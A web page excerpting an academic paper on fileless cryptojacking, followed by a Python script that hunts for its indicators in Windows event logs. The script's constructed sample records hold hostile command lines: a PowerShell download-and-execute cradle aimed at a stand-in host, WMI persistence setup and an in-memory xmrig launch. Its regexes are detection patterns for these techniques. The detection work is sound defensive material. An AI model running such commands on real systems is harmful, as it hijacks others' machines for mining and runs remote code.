Avt crypto


Author: Admin | 2025-04-28

[27], [28], [25]. In a cryptojacking attack, a victim may suffer from a lack of computer performance, declining hardware (CPU, GPU, and battery), and high electricity bills. There are three types of cryptojacking attacks:

1) In-browser cryptojacking: runs on cryptojacking websites that contain hidden mining scripts [29].
2) In-host cryptojacking: runs on the operating system and disk (ROM) as a malicious program [29].
3) In-memory-only cryptojacking: runs in memory (RAM) only, with malicious scripts [30].

978-1-6654-0652-9/22/$31.00 ©2022 IEEE

Fig. 1. The popularity rate of the words "fileless malware" and "cryptojacking" on Google.

Although in-browser cryptojacking attacks declined after Coinhive (an in-browser crypto-mining service) shut down in March 2019, in-memory cryptojacking is one of the most prevalent threats in the wild [5]. 25% more cryptocurrency mining malware was observed in 2020 than in 2019 [31]. With the rise of fileless malware and cryptojacking incidents, cybercriminals have today merged these attacks into a dangerous combination: fileless cryptojacking malware [32]. Even though fileless malware and cryptojacking attacks started independently, and both attack types gained popularity in 2017, as shown in Fig. 1, cryptojacking incidents have been observed together with fileless malware attacks since 2019 [32].

In this paper, we attempt to provide an understanding of the emerging fileless cryptojacking. The second goal is to fill a gap in the literature, as there is no sufficient research on this new problem. Finally, we present a novel threat hunting-oriented DFIR approach with best practices derived from academic research and field experience. To the best of our knowledge, this paper is one of the first comprehensive research attempts on "fileless cryptojacking."

II. FILELESS MALWARE WORKFLOW

Malware analysis relies on the analysis of executable binaries, but in fileless malware there is no actual executable stored on disk to inspect [7].
It stays and operates in Random Access Memory (RAM) and removes its footprints to increase the difficulty of removal [6]. It is also called non-malware, an Advanced Volatile Threat (AVT) [33], or a Living-off-the-Land (LotL) attack, as threat actors use legitimate tools, processes, benign software utilities, and libraries during an attack [8]. These are built-in, native, and highly trusted Windows components such as Windows Management Instrumentation (WMI) subscriptions, PowerShell, and Microsoft Office macros [10]. Thus it is stealthy, and it is almost impossible to block legitimate built-in tools outright. In other words, the operating system attacks itself.

However, fileless malware is a broad term, and some attacks combine file-based techniques with fileless malware. Some phases of the attack chain can be fileless while others store files on disk [34]. Moreover, in a ransomware incident, the attack is completed by writing files to disk. However, the delivery, execution, and
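The LotL components named above (PowerShell, WMI event subscriptions) still leave traces in Windows event logs even when nothing is written to disk, which is what a threat hunter works from. The following Python script is an added example written for this page; it is not the paper's DFIR method and not any vendor's tooling. It scores constructed Windows event records (Sysmon process creations, a PowerShell 4104 script block) for the fileless cryptojacking indicators this section describes: an encoded PowerShell command that decodes to a download-and-execute cradle, the permanent WMI event subscription classes, and stratum mining-pool arguments on a miner launched from memory. The key=value record layout, the host names, the URLs and every SAMPLE_LOG record are constructed for the example.

```python
"""Hunt for fileless cryptojacking indicators in Windows event log records.

Added example for this page; not the paper's DFIR method and not any vendor's
tooling. The key=value record layout, host names, URLs and the SAMPLE_LOG
records are constructed for the example, not real captures.
"""
import base64
import re
from dataclasses import dataclass, field

# Indicators for the LotL techniques the text names: PowerShell abuse, WMI
# event-subscription persistence, and the pool traffic a miner must generate.
ENCODED_CMD = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_CRADLE = re.compile(r"(?:IEX|Invoke-Expression)\b.*(?:DownloadString|DownloadData|Net\.WebClient)", re.I)
WMI_PERSISTENCE = ("__EventFilter", "CommandLineEventConsumer", "ActiveScriptEventConsumer", "__FilterToConsumerBinding")
STRATUM_URL = re.compile(r"stratum\+(?:tcp|ssl)://", re.I)
MINER_FLAGS = re.compile(r"--donate-level|--coin\s|-o\s+stratum|xmrig|--algo\s+(?:rx|cn)/", re.I)
WMI_NEW_SUBSCRIPTION_EVENT = 5861  # Microsoft-Windows-WMI-Activity: new permanent event consumer


def decode_powershell(blob: str) -> str:
    """-EncodedCommand payloads are base64 over UTF-16LE; return '' if malformed."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def parse_line(line: str) -> dict:
    """Parse key=value tokens; a value may be double-quoted and contain spaces."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}


@dataclass
class Finding:
    event_id: int
    host: str
    score: int = 0
    reasons: list = field(default_factory=list)


def score_event(fields: dict) -> Finding:
    """Weight each indicator; a single weak signal stays below the hunt threshold."""
    f = Finding(int(fields.get("EventID", 0)), fields.get("Host", "?"))
    text = fields.get("CommandLine", "") + " " + fields.get("ScriptBlockText", "")
    m = ENCODED_CMD.search(text)
    if m:
        f.score += 2
        f.reasons.append("encoded PowerShell")
        text += " " + decode_powershell(m.group(1))  # hunt inside the decoded payload too
    if DOWNLOAD_CRADLE.search(text):
        f.score += 3
        f.reasons.append("download-and-execute cradle (nothing written to disk)")
    if f.event_id == WMI_NEW_SUBSCRIPTION_EVENT or any(c in text for c in WMI_PERSISTENCE):
        f.score += 3
        f.reasons.append("WMI permanent event subscription")
    if STRATUM_URL.search(text):
        f.score += 4
        f.reasons.append("stratum mining-pool URL")
    if MINER_FLAGS.search(text):
        f.score += 2
        f.reasons.append("miner command-line flags")
    return f


def hunt(lines, threshold: int = 3) -> list:
    """Return findings at or above the threshold, in log order."""
    return [f for f in (score_event(parse_line(line)) for line in lines) if f.score >= threshold]


def b64ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1')"
# Constructed sample records (not real captures): Sysmon 1 process creations,
# a PowerShell 4104 script block, and a miner started straight from memory.
SAMPLE_LOG = [
    r'EventID=1 Host=ws01 Image="C:\Windows\System32\svchost.exe" CommandLine="svchost.exe -k netsvcs"',
    f'EventID=1 Host=ws02 CommandLine="powershell.exe -nop -w hidden -enc {b64ps(CRADLE)}"',
    f'EventID=1 Host=ws03 CommandLine="powershell.exe -enc {b64ps("Get-Process | Sort-Object CPU")}"',
    r'EventID=4104 Host=ws04 ScriptBlockText="Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name=upd;EventNamespace=root\cimv2;QueryLanguage=WQL;Query=SELECT * FROM __InstanceModificationEvent WITHIN 60}"',
    r'EventID=1 Host=ws05 CommandLine="powershell.exe -w hidden -c [Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,@(xmrig -o stratum+tcp://pool.example.invalid:3333 --donate-level 0))"',
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(f"{hit.host} event {hit.event_id} score {hit.score}: {', '.join(hit.reasons)}")
```

Decoding the -EncodedCommand payload is what exposes the cradle hidden in the ws02 record; the encoded command on its own (ws03, which decodes to a harmless Get-Process) scores below the threshold, since legitimate administration uses encoding too. The weights are an illustrative assumption: in practice a hunter tunes them against the environment's baseline of WMI subscriptions and scripted administration.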
